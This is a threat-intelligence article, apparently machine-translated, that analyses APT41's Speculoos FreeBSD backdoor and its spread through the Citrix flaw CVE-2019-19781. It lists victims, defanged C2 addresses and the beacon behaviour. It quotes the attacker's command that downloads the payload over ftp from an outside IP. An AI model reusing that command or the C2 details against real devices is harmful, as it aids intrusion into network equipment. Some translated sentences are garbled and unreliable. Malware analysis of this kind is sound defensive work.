How to perform APT41 Speculoos backdoor analysis

FireEye released a report on APT41 global attack activities on March 25, 2020. This attack campaign occurred between January 20 and March 11, and mainly targeted Citrix, Cisco and Zoho network equipment. The researchers obtained the attack sample 'Speculoos' targeting Citrix devices based on WildFire and AutoFocus data and also identified victims in multiple industries around the world, including North America, South America and Europe.

Speculoos is implemented based on FreeBSD. A total of five samples were identified. The file sizes of all samples are basically the same, and there are minor differences between the sample sets. Speculoos exploits CVE-2019-19781 for attack propagation. CVE-2019-19781 affects Citrix Application Delivery Controller, Citrix Gateway, and Citrix SD-WAN WANOP, allowing attackers to remotely execute arbitrary commands.

Attack details

The attacker exploited CVE-2019-19781 to remotely execute commands: '/usr/bin/ftp -o /tmp/bsd ftp://test: [redacted ]\@ 66.42.98[.]220/'.

The first wave of attacks began on the evening of January 31, 2020, using a file named bsd, affecting multiple higher education institutions in the United States, American medical institutions, and Irish consulting companies. The second wave of attacks began on February 24, 2020, using the file name un, and affected Colombian higher education institutions, Austrian manufacturing organizations, U.S. higher education institutions, and U.S. state governments.

Malware based on BSD systems is relatively rare. This tool is related to specific Citrix network devices, so Speculoos is likely to be developed by the APT41 organization specifically for this attack activity.

Binary Analysis

The Speculoos backdoor of the ELF executable compiled with GCC 4.2.1 can be run on FreeBSD systems. The payload cannot maintain persistent control over the target, so the attacker uses additional components or other attack methods to maintain control. After executing the backdoor, a loop will be entered, which communicates with the C2 domain through port 443 and calls the function

##alibaba.zzux[.]com (119.28.139[.]120)

When there is a communication problem, Speculoos will try to connect to the backup C2 server through port 443, whose IP address is 119.28.139[.]20. If connected to any C2 server, it will perform a TLS handshake with the server. Figure 1 shows the packet sent to the C2 server.

It requests login.live[.]com as the Server Name Indication (SNI).

After successfully connecting to the C2 and completing the TLS handshake, Speculoos will fingerprint the target system and send the data back to the C2 server. Its structure is shown in Table 1 below.

The data is sent over the TLS channel, and Speculoos waits for a two-byte response from the server. After receiving the response, it sends a byte (0xa) to C2 and enters a loop waiting for the command. Table 2 shows the commands that the attacker can execute, allowing the attacker to fully control the victim system.

The two Speculoos samples analyzed in the study are functionally identical, with only eight bytes different between them, 'hostname' when collecting system information Caused by differences from the 'uname -s' command. uname -s returns kernel information, hostname returns the host system name. The image below shows a binary comparison between two Speculoos samples.

Impact Assessment

Internet-accessible devices allowing unauthorized users to remotely execute code will bring about great security issues, CVE- 2019-19781 affects multiple internet-facing devices, with attackers actively exploiting this vulnerability to install custom backdoors. An attacker can monitor or modify an entire organization's network activity because all affected organization's network activity must pass through these network devices.

By default, these devices can directly access the organization's system, and attackers do not need to consider the issue of lateral movement within the internal network. Cyber ​​attackers have several means of attack, such as altering network data, injecting malicious code, performing man-in-the-middle attacks, or luring users to fake login pages to steal login information.

The above is the detailed content of How to perform APT41 Speculoos backdoor analysis. For more information, please follow other related articles on the PHP Chinese website!